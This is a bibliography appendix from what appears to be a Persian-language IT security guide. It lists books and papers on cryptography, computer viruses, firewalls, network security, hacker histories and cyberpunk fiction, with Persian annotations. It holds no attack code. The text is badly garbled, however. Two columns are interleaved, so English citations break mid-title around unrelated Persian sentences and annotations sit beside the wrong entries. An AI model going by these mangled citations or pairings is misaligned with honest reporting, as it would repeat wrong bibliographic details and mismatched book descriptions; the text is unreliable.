Hoffman, Lance J., Rogue Programs: ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺗﻮﻟﻴـﺪ ﻛـﺮﺩ ﻛـﻪ ﺗﺤﻤـﻞ
Viruses, Worms and Trojan Horses. New ﺧﻄﺎﻱ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺷﺘﻪ ﻭ ﺍﺯ ﺍﺳﺘﺤﻜﺎﻡ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ:
York, NY: Van Nostrand Reinhold, 1990.
Leveson, Nancy G. Safeware: System
ﻳﻚ ﻧﺸﺮﻳﺔ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ Safety and Computers. A Guide to
ﺣﺬﻑ ﺁﻧﻬﺎ ،ﻛﻪ ﺑﺴﻴﺎﺭ ﻣﻌﺘﺒﺮ ﺍﺳﺖ ،ﻭ ﺑﻪ ﻧﻈﺮ ﻣﻲﺭﺳﺪ ﺑﻴـﺸﺘﺮ ﺑـﻪ Preventing Accidents and Losses Caused
by Technology. Reading, MA: Addison
ﺩﺭﺩ ﺍﺩﺍﺭﺍﺗﻲ ﻣﻲﺧﻮﺭﺩ ﻛﻪ ﺗﻌﺪﺍﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳـﺖ .ﺍﻳـﻦ Wesley, 1995.
ﻧﺸﺮﻳﻪ ﻫﻤﭽﻨﻴﻦ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎﻳﻲ ﺑﺮﮔـﺰﺍﺭ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺩﺭ ﺁﻧﻬـﺎ
ﻣﻲﺗﻮﺍﻥ ﻣﻘﺎﻻﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺩﺭ ﻣﻮﺭﺩ ﻭﻳﺮﻭﺳﻬﺎ ﭘﻴﺪﺍ ﻛﺮﺩ: ﻛﺘﺎﺏ ﺯﻳﺮ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻣﻬﻤﺘـﺮﻳﻦ ﺭﺧـﺪﺍﺩﻫﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﺍﺯ
ﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺑﻮﻗـﻮﻉ ﭘﻴﻮﺳـﺘﻪﺍﻧـﺪ.
The Virus Bulletin. Virus Bulletin CTD. Oxon, ﻧﻮﻳـﺴﻨﺪﺓ ﺍﻳـﻦ ﻛﺘـﺎﺏ )ﺩﻛﺘــﺮ ﻧﻴـﻮﻣﻦ( ﺳـﺮﺩﺑﻴﺮ ﻓﻬﺮﺳـﺖ ﭘــﺴﺘﻲ
)England. (http://www.virusbtn.com
"ﻣﺨﺎﻃﺮﺍﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ" ﺍﺳﺖ.
:ﺍﺳﺖ
Codes, and Cryptography. (1991):, 46–62.
Schneier, Bruce. Applied Cryptography:
Lenstra, A.K., H. W. Lenstra, Jr., M.S. Protocols, Algorithms, and Source Code in
Manasse, and J.M. Pollard. “The Number C. Second edition. New York, NY: John
Field Sieve.” Proceedings of the 22nd ACM Wiley & Sons, 1996.
Symposium on the Theory of Computing.
Baltimore MD: ACM Press, 1990, 564–72.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٩٨
ﻗﻴﻤﺖ.ﺍﻳﻦ ﻧﺸﺮﻳﻪ ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻣﻄﺒﻮﻋﺎﺕ ﺍﻳﻦ ﺣﻮﺯﻩ ﺍﺳﺖ :ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﻣﻔﻬﻮﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻋﻨﻮﺍﻥ ﻛﺮﺩﻩ ﺍﺳﺖ
ﺍﻳﻦ ﻧﺸﺮﻳﻪ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺍﺷـﺘﺮﺍﻙ ﻣﺆﺳـﺴﺎﺕ
Merkle, Ralph. “Secure Communication over
ﻫﺮ ﺷﻤﺎﺭﺓ ﺍﻳﻦ ﻧـﺸﺮﻳﻪ ﺑـﻪ ﺩﻫﻬـﺎ.ﻣﻨﺎﺳﺐ ﺍﺳﺖ ﺗﺎ ﺍﻓﺮﺍﺩ ﺣﻘﻴﻘﻲ Insecure Channels.” Communications of the
ﻧﺸﺮﻳﻪ ﻭ ﺳﺎﺯﻣﺎﻥ ﺩﻳﮕﺮ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﻬـﺎ ﻣﻄﺎﻟـﺐ ﻗﺎﺑـﻞ ACM 21 (1978): 294–99 (submitted in 1975).
. ﻣﺮﺍﺟﻊ ﻭ ﻣﻜﺎﺗﺒـﺎﺕ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﺩ،ﺗﻮﺟﻪ ﻳﺎﻓﺖ ﺷﻮﺩ ﻭ ﻧﻴﺰ ﻣﻘﺎﻻﺕ
Merkle, Ralph, and Martin E. Hellman. “On
ﺁﺩﺭﺱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺻﻔﺤﺎﺕ ﻭﺏ ﺁﻥ ﻧﻴﺰ ﺩﺭ ﻗﺴﻤﺖ ﮔﺎﻫﻨﺎﻣـﻪﻫـﺎﻱ the Security of Multiple Encryption.”
.ﺍﻣﻨﻴﺘﻲ )ﺍﻧﺘﻬﺎﻱ ﻫﻤﻴﻦ ﭘﻴﻮﺳﺖ( ﺁﻣﺪﻩ ﺍﺳﺖ Communications of the ACM 24 (1981):
465–67.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻨـﻮﺯ.ﻳﻚ ﻣﻘﺪﻣﺔ ﻗﻮﻱ ﺍﺯ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ
Merkle, Ralph, and Martin E. Hellman.
ﻫﻢ ﺑﻴﺸﺘﺮ ﺍﺻـﻮﻝ ﮔﻔﺘـﻪﺷـﺪﻩ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ “Hiding Information and Signatures in Trap
:ﭘﻴﺸﺮﻓﺘﻪ ﻧﻴﺰ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﺩ Door Knapsacks.” IEEE Transactions on
Information Theory 24 (1978): 525–30.
Gasser, Morrie. Building a Secure Computer
Rivest, Ron, A. Shamir, and L. Adleman. “A
System. New York, NY: Van Nostrand
Method for Obtaining Digital Signatures and
Reinhold, 1988.
Public Key Cryptosystems.”
Communications of the ACM 21 (1978).
ﻳــﻚ ﻛﺘــﺎﺏ ﻭ ﻣﺮﺟــﻊ ﺗﺤﻘﻴﻘــﺎﺗﻲ ﺧــﻮﺏ ﻛــﻪ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ
:ﺩﺍﻧﺸﮕﺎﻫﻲ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻣﻲﺷﻮﺩ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﻋﺎﻡ
Gollmann, Dieter. Computer Security; ﻳﻚ ﻣﻘﺪﻣﺔ ﻛﺎﻣﻞ ﻭ ﻣﻨﺎﺳﺐ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺳﻄﺢ ﻣﺘـﻮﻥ
Chichester, UK, John Wiley & Sons, 1999.
:ﺩﺍﻧﺸﮕﺎﻫﻲ
ﻣﺠﻤﻮﻋﺔ ﺑﺰﺭﮒ ﻭ ﺟﺎﻣﻌﻲ ﺍﺯ ﻣﻘﺎﻻﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﻤﺔ ﺟﻨﺒﻪﻫـﺎﻱ Amoroso, Edward. Fundamentals of
:ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ Computer Security Technology. Englewood
Cliffs, NJ: Prentice-Hall, 1994.
Hunt, A. E., S. Bosworth, and D. B. Hoyt,
eds. Computer Security Handbook, 3rd ﺑـﺎ،ﻛﺘﺎﺏ ﺟﺎﻣﻌﻲ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻧﺘﻬـﺎ ﺑـﻪ ﺍﻧﺘﻬـﺎ
edition. New York, NY: Wiley, 1995.
:ﻣﺪﻧﻈﺮ ﺩﺍﺷﺘﻦ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ
:ﻳﻚ ﻣﻘﺪﻣﺔ ﺧﻮﺏ ﺩﻳﮕﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ Anderson, Ross. Security Engineering; NYC,
NY: John Wiley & Sons, 2001.
Pfleeger, Charles P and Shari Lawrence
Pfleeger. Security in Computing. Englewood
Cliffs, NJ: Prentice-Hall, 3rd edition, 2002. ﻳﻚ ﻛﺘﺎﺏ ﺑﺴﻴﺎﺭ ﺧـﻮﺏ ﺩﺭ ﺗﺎﺭﻳﺨﭽـﻪ ﻭ ﺳـﺎﺧﺘﺎﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
:ﻣﻬﺎﺟﻢﻳﺎﺏ ﺑﺮﺍﻱ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﺷﺒﻜﻪﻫﺎ
ﻭ،ﻳﻚ ﻣﻘﺪﻣﺔ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ
:ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﺍﻟﺰﺍﻣﺎﺕ ﻭ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﻭﻟﺖ Bace, Rebecca. Intrusion Detection;
Indianapolis, IN: Macmillan, 2000.
Russell, Deborah, and G. T. Gangemi, Sr.
Computer Security Basics. Sebastopol, CA: ﺩﺭElsevier ﺑﺎﺭ ﺩﺭ ﺳـﺎﻝ ﺗﻮﺳـﻂ ﺍﻧﺘـﺸﺎﺭﺍﺕ۸ ﻧﺸﺮﻳﻪﺍﻱ ﻛﻪ
O’Reilly & Associates, 1991. ﺁﻛﺴﻔﻮﺭﺩ ﺍﻧﮕﻠﺴﺘﺎﻥ ﺑﻪ ﭼﺎﭖ ﻣﻲﺭﺳﺪ )ﺑﺮﺍﻱ ﺳﻔﺎﺭﺵ ﻛﺘﺎﺏ ﺑﺎ ﺷـﻤﺎﺭﺓ
:( ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ+44 (0) 865-512242
Schneier, B. Secrets and Lies: Digital Computers & Security
Security in a Networked World. New York:
John Wiley & Sons, 2000.
٤٩٩ ﭘﻴﻮﺳﺘﻬﺎ
ﻳﻚ ﻣﺮﺟﻊ ﻛﺎﻣـﻞ ﻭ ﺟـﺬﺍﺏ ﻛـﻪ ﺑـﻪ ﺗـﺸﺮﻳﺢ ﻧﺤـﻮﺓ ﻋﻤﻠﻜـﺮﺩ ﻣﻄﺎﻟﻌﺔ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺪﻧﺒﺎﻝ ﺩﺭﻙ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ
، ﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﭘﺮﻭﺗﻜﻠﻬـﺎ- TCP/IP ﺷﺒﻜﻪ ﻫﺎﻱ :ﺍﻣﻨﻴﺖ ﻭ ﺍﻋﺘﻤﺎﺩ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ ﻳﻚ ﺿﺮﻭﺭﺕ ﺍﺳﺖ
: ﻣﻲﭘﺮﺩﺍﺯﺩ- ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ،tuning
Thompson, Ken. “Reflections on Trusting
Trust” Communications of the ACM, Volume
Comer, Douglas E. Internetworking with
27, Number 8, August (1984).
TCP/IP, 3rd Edition. Englewood Cliffs, NJ:
Prentice Hall, 4th edition, 2000.
ﻭ ﻣـﺸﻜﻼﺕ،ﻳﻚ ﻛﺘﺎﺏ ﻋﺎﻟﻲ ﺩﺭ ﻣﻮﺭﺩ ﺗﻮﻟﻴﺪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﻳﻤـﻦ
Garfinkel, Simson. Web Security, Privacy, :ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺑﻲﺿﺎﺑﻄﻪ
and Commerce, 2nd Edition. Cambridge,
MA: O’Reilly and Associates, Inc. 2002.
Viega, John and Gary McGraw. Building
Secure Software; Indianapolis, IN: Pearson/
Windows 2000 ﺭﺍ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱkerberos ﻛﺘﺎﺑﻲ ﻛﻪ Addison-Wesley, 2002.
: ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺗﺸﺮﻳﺢ ﻛﺮﺩﻩ ﺍﺳﺖUnix ﻭ
ﻛﺘﺎﺑﻲ ﺷﺎﻣﻞ ﻳﻚ ﻓﻬﺮﺳﺖ ﺟﺎﻣﻊ ﻭ ﺟﺰﺋﻲ ﺑﺮﺍﻱ ﺑﺮﺁﻭﺭﺩ ﻭﺿﻌﻴﺖ
Garman, Jason. Kerberos – The Definitive :ﺍﻳﻤﻨﻲ ﺭﺍﻳﺎﻧﻪ ﻭ ﻋﻤﻠﻴﺎﺕ
Guide. Cambridge, MA: O’Reilly and
Associates, Inc, 2003.
Wood, Charles Cresson, et al. Computer
Security: A Comprehensive Controls
)ﻭ ﺑـﺎ ﺗﻤﺮﻛـﺰTCP/IP ﻛﺘﺎﺑﻲ ﻛﻪ ﻣﺮﻭﺭﻱ ﻋﺎﻟﻲ ﺑﺮ ﺷﺒﻜﻪ ﺳﺎﺯﻱ Checklist, New York, NY: John Wiley &
( ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩ ﻭ ﻳﻚ ﻣﺮﺟﻊ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺑﺮﺍﻱUnix ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ Sons, 1987.
ﻣﺎﻧﻨـﺪ- Unix ﺑﺮﭘﺎﻳﻲ ﺧﺪﻣﺎﺕ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﺻﻠﻲ ﺷـﺒﻜﻪﻫـﺎﻱ
ﺍﻣـﺎ ﺍﮔـﺮ ﺑﺘﻮﺍﻧﻴـﺪ،ﻫﺮﭼﻨﺪ ﺍﻳﻦ ﻛﺘﺎﺏ ﻫﻢ ﺍﻛﻨﻮﻥ ﺩﺭ ﺑﺎﺯﺍﺭ ﻧﻴـﺴﺖ
: ﻣﻲﺑﺎﺷﺪ- sendmail ﻭBind
ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳـﻚ ﻣﺮﺟـﻊ ﺑـﺴﻴﺎﺭ،ﻳﻚ ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲ ﺁﻧﺮﺍ ﺑﻴﺎﺑﻴﺪ
Hunt, Craig. TCP/IP Network .ﺑﺎﺍﺭﺯﺵ ﺑﺮﺍﻳﺘﺎﻥ ﺗﺒﺪﻳﻞ ﺷﻮﺩ
Administration.Sebastopol, CA: O'Reilly &
Associates, 3rd edition, 2002. ﻓﻨﺎﻭﺭﻱ ﻭ ﺍﻳﻤﻨﻲ ﺷﺒﻜﻪ
Kaufman, Charles, Radia Perlman, and Mike
Speciner. Network Security: Private ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻘﺮﻳﺒـﹰﺎ.ﺩﻭﻣﻴﻦ ﻭﻳﺮﺍﻳﺶ ﺍﺯ ﻣﺮﺟﻊ ﺳﻨﺘﻲ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ
Communications in a Public World. ﻫﻤﺔ ﻧﻜﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻧﺤﻮﺓ ﻋﻤﻠﻜﺮﺩ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺭﺍ ﺑﻪ ﺷـﻤﺎ
Englewood Cliffs, NJ: Prentice-Hall, 2nd
edition, 2002.
ﻣﺘﻦ ﺍﻭﻟﻴﺔ ﻛﺘﺎﺏ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩ ﻭ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ.ﻣﻲﺁﻣﻮﺯﺩ
ﻗﺎﺑـــﻞ ﺩﺳﺘﺮﺳـــﻲhttp://www.wilyhacker.com/1e/
:ﻳﻚ ﻛﺘﺎﺏ ﻣﻘﺪﻣﺎﺗﻲ ﻣﻨﺎﺳﺐ :ﺍﺳﺖ
Stallings, William. Cryptography and Cheswick, Bill, Steve Bellovin, and Aviel
Network Security: Principles and Practices. Rubin. Firewalls and Internet Security:
Englewood Cliffs, NJ: PrenticeHall, 2003. Repelling the Wily Hacker, 2nd Edition.
Reading, MA: Addison-Wesley, 2003.
ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﺪﻣﺎﺕ ﻭ ﻣﺤﺼﻮﻻﺕ ﺍﻣﻨﻴﺘﻲ
ﺑﺨﺶ ﺷﺸﻢ
ﻳﻚ ﻛﺘﺎﺏ ﺁﻣﻮﺯﺷـﻲ ﻋـﺎﻟﻲ ﻛـﻪ ﺑـﺎ ﺟﺰﺋﻴـﺎﺕ ﺭﻭﺷـﻦ ﺑـﻪ ﺷـﻤﺎ
ﻓﻬﺮﺳﺖ ﺟﺎﻣﻌﻲ ﺍﺯ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ :ﻣﻲﺁﻣﻮﺯﺩ ﻛﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﻮﺩ ﺭﺍ ﺑﺴﺎﺯﻳﺪ
ﺍﻳـﻦ.ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﺑـﺼﻮﺭﺕ ﺗﺠـﺎﺭﻱ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻫـﺴﺘﻨﺪ
Chapman, D. Brent, and Elizabeth D.
ﺑﺎ ﻋﻀﻮﻳﺖ ﺩﺭ ﻣﺆﺳﺴﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﺭﺍﻳﮕﺎﻥ ﻣﻲﺑﺎﺷﺪ،ﻓﻬﺮﺳﺖ Zwicky. Building Internet Firewalls.
:(http://www.gocsi.com )ﻭ ﺁﺩﺭﺱ ﻭﺏ ﺁﻥ ﻫﻢ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ Sebastopol, CA: O’Reilly & Associates, 2nd
edition, 2000.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٥٠٠
Littman, Jonathan, The Fugitive Game: Computer Security Buyer’s Guide, Computer
Online with Kevin Mitnick. Boston, MA: Little, Security Institute, San Francisco, CA.
Brown, 1996. )(Order from CSI, 415-905-2626
ﺩﺭ ﺭﻭﺯ ﻛﺮﻳــﺴﻤﺲ ﺳــﺎﻝ ،۱۹۹۴ﻳــﻚ ﻣﻬــﺎﺟﻢ ﺑــﻪ ﺭﺍﻳﺎﻧــﻪ ﺩﺭﻙ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ
Shimoraﻧﻔﻮﺫ ﻛﺮﺩ .ﭼﻨﺪ ﻫﻔﺘﻪ ﺑﻌـﺪ ﺍﺯ Shimoraﺧﻮﺍﺳـﺘﻪ
ﺷﺪ ﻛـﻪ ﺩﺭ ﻣﺠﻤﻮﻋـﻪ ﺣﻤﻼﺗـﻲ ﻛـﻪ ﺑـﻪ ﭼﻨـﺪ ﻣﺮﻛـﺰ ISPﺩﺭ ﺗﻤﺎﻣﻲ ﻣﺮﺍﺟﻊ ﺯﻳﺮ ،ﺟﻨﺒﻪﻫﺎﻳﻲ ﺍﺯ ﺁﻳﻨﺪﺓ ﺷﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ
ﺳﺎﻥﻓﺮﺍﻧﺴﻴﺴﻜﻮ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﻛﻤﻚ ﻛﻨﺪ .ﺩﺭ ﻧﻬﺎﻳـﺖ ،ﺭﺩ ﻣﻬـﺎﺟﻢ ﺗﺸﺮﻳﺢ ﻣﻲﻧﻤﺎﻳﻨﺪ ﻭ ﺑﻴﺸﺘﺮ ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺭﻣﺰﺷﻜﻨﻬﺎ ﻣـﻮﺭﺩ ﺑﺤـﺚ
ﺑﻪ ﻛﺎﻟﻴﻔﺮﻧﻴﺎﻱ ﺷﻤﺎﻟﻲ ﺭﺳـﻴﺪ ﻭ ﺍﺩﺍﻣـﺔ ﺗﺤﻘﻴﻘـﺎﺕ ﺑـﻪ ﺗﻌﻘﻴـﺐ ﻭ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ.
ﺩﺳﺘﮕﻴﺮﻱ Kevin Mitnickﻣﻨﺠﺮ ﺷﺪ .ﺍﻳـﻦ ﺩﺍﺳـﺘﺎﻧﻲ ﺍﺳـﺖ
ﻛﺘﺎﺑﻲ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﺨﺘﻠـﻒ ﻧﻔـﻮﺫﮔﺮﺍﻥ
ﻛﻪ ﺗﻮﺳﻂ Shimoraﻭ ) Markoffﺭﻭﺯﻧﺎﻣﻪ ﻧﮕﺎﺭ ﺭﻭﺯﻧﺎﻣﺔ ﻧﻴﻮﻳﻮﺭﻙ
ﺍﺳﺘﺮﺍﻟﻴﺎﻳﻲ .ﺑﻌﻀﻲ ﺍﺯ ﺩﺍﺳـﺘﺎﻧﻬﺎﻱ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺻـﺤﺖ ﻧﺪﺍﺭﻧـﺪ،
ﺗﺎﻳﻤﺰ ﻛﻪ ﺍﺯ ﻣﺎﺟﺮﺍﻱ ﺩﺳﺘﮕﻴﺮﻱ ﮔﺰﺍﺭﺵ ﺗﻬﻴﻪ ﻛﺮﺩﻩ( ﺩﺭ ﻛﺘﺎﺏ ﺯﻳﺮ ﺷـﺮﺡ
ﭼﺮﺍﻛﻪ ﻧﻮﻳﺴﻨﺪﻩ ﻧﺘﻮﺍﻧـﺴﺘﻪ ﺑـﺎ ﺗﻤـﺎﻡ ﻗﺮﺑﺎﻧﻴـﺎﻥ ﺗﻤـﺎﺱ ﺑﮕﻴـﺮﺩ ﻭ
ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ.
ﺻﺤﺖ ﻭ ﺳﻘﻢ ﻣﻄﻠﺐ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ:
Shimomura, Tsutomu, with John Markoff.
Dreyfus, Suelette. Underground; Australia,
Takedown: The Pursuit and Capture of
Reed Books, 1997.
Kevin Mitnick, America’s Most Wanted
Computer Outlaw—By the Man Who Did It.
NewYork, NY: Hyperion, 1995. ﻛﺘﺎﺑﻲ ﻛﻪ ﺗﻮﺳﻂ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻋﻠﻤﻲ -ﺗﺨﻴﻠﻲ ﺑﻪ ﺭﺷـﺘﺔ ﺗﺤﺮﻳـﺮ
ﺩﺭﺁﻣﺪ ﻭ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﻛﻠﻤﺔ "ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ" ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩﻩ ﺑﻮﺩ:
Sterling, Bruce. The Hacker Crackdown:
Law and Disorder on the Electronic Frontier.
Gibson, William. Burning Chrome,
Neuromancer, Count Zero, Mona Lisa
ﻛﺘــﺎﺏ ﻓــﻮﻕ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ ﻣﺘﻌــﺪﺩﻱ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﻗﺎﺑــﻞ Overdrive, Virtual Light, Idoru, All
ﺩﺳﺘﺮﺳــﻲ ﺍﺳــﺖ ،ﺍﺯ ﺟﻤﻠــﻪ ﺩﺭ ﻓﻬﺮﺳــﺘﻬﺎﻱ ،COASTﻭ ﻧﻴــﺰ Tomorrow’s Parties. New York, NY: Bantam
Books Cyberpunk.
ﺁﺩﺭﺱ ﺯﻳﺮ:
http://www.swiss.ai.mit.edu/~bal/sterling/con ،Kevin )Mitrickﻛﺘــﺎﺑﻲ ﻛــﻪ ﺩﺍﺳــﺘﺎﻧﻬﺎﻳﻲ ﺍﺯ ﺳـــﻪ ﻧﻔـﻮﺫﮔـــﺮ
tents.html
،Pengoﻭ (Robert.T.Morrisﺭﺍ ﺑﺎﺯﮔﻮﻳﻲ ﻣﻲﻛﻨﺪ:
ﻳﻚ ﻣﺎﺟﺮﺍﻱ ﺧﻮﺍﻧﺪﻧﻲ ﺍﺯ ﺗﻌﻘﻴﺐ ﻳﻚ ﻣﻬﺎﺟﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺯ ﻃﺮﻳﻖ
Hafner, Katie and John Markoff, Cyberpunk:
ﺷﺒﻜﻪ .ﺑﻌﺪﻫﺎ ﻣﺸﺨﺺ ﺷـﺪ ﻛـﻪ ﺍﻳـﻦ ﻣﻬـﺎﺟﻢ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻥ Outlaws and Hackers on the Computer
KGBﻛﺎﺭ ﻣﻲﻛﺮﺩﻩ ﻭ ﺗﻼﺵ ﻭﻱ ﺑـﺮ ﺁﻥ ﺑـﻮﺩﻩ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ Frontier. New York, NY: Simonand Schuster,
1991.
ﺣﺴﺎﺱ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺪﺯﺩﺩ:
ﻳﻜﻲ ﺍﺯ ﻛﺘﺎﺑﻬﺎﻱ ﺍﻭﻟﻴـﻪ ﻛـﻪ ﺑـﻪﺗـﺸﺮﻳﺢ ﭘﺎﻳﺒﻨـﺪﻳﻬﺎ ﻭ ﺍﻋﺘﻘـﺎﺩﺍﺕ
Stoll, Cliff. The Cuckoo’s Egg, Garden City,
NY: Doubleday, 1989. ﺍﺧﻼﻗﻲ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻲﭘﺮﺩﺍﺯﺩ:
ﻳﻚ ﻧﻴﺎﺯ ﺍﺳﺎﺳﻲ ﺑﺮﺍﻱ.Perl ﻣﺮﺟﻊ ﺍﺻﻠﻲ ﺯﺑﺎﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ Tor SF Doubles, October, TorBooks, 1990.
sed ﻭ ﻳــﺎ،awk ،shell ﻫﻤــﺔ ﻛــﺴﺎﻧﻲ ﻛــﻪ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ
Vinge, Vernor. True Names and Other
ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻣﻲﻛﻨﻨﺪ ﻭ ﻳـﺎ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﺑـﻪ ﺳـﺮﻋﺖ ﻧﻮﺷـﺘﻦ Dangers. New York,NY: Baen, distributed by
